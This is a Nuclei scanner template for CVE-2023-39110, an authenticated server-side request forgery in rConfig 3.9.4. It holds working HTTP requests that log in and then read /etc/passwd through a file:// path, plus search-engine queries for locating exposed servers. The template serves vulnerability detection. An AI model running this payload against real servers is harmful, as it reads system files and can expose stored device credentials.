id: CVE-2023-39110

info:
  name: rConfig 3.9.4 - Server-Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
  impact: |
    Authenticated attackers can exploit SSRF through the path parameter in ajaxGetFileByPath.php to read local files and access internal network resources, potentially exposing network device configurations and credentials stored in rConfig.
  remediation: |
    Update rConfig to a version newer than 3.9.4 that validates URLs in the path parameter of ajaxGetFileByPath.php and restricts access to authorized protocols and destinations.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.4.zip
    - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39110
    - https://github.com/zer0yu/CVE_Request
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-39110
    cwe-id: CWE-918
    epss-score: 0.80148
    epss-percentile: 0.99138
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2023,cve,rconfig,authenticated,ssrf,lfr,vuln

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1

      - |
        GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body_1
        words:
          - 'rConfig'

      - type: status
        part: header_3
        status:
          - 200
# digest: 4a0a004730450220358201d3d9b5c10d6443b20ae36437831401a858585da77e8feeecd9505b2d17022100bf6a78c0f341ebdad56275bce858c43c6899c9d49b90a7a3bcf7db06f55322af:922c64590222798bb761d5b6d8e72950